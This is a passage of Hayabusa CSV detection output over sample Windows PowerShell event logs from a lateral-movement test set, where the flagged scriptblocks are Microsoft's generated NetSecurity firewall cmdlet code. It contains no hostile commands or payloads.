${Authentication} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSecurityFilter' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.401 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSecurityFilter' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.401 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.403 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.403 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallSecurityFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.404 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallSecurityFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.434 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetProtocolPortFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallPortFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Protocol}, [Parameter(ParameterSetName='ByQuery')] [Alias('DynamicTransport')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport[]] ${DynamicTarget}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Protocol') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Protocol}) $__cmdletization_queryBuilder.FilterByProperty('Protocol', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DynamicTarget') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DynamicTarget}) $__cmdletization_queryBuilder.FilterByProperty('DynamicTransport', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallPortFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallPortFilter' -Alias '*' function Set-NetFirewallPortFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallPortFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallPortFilter' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service 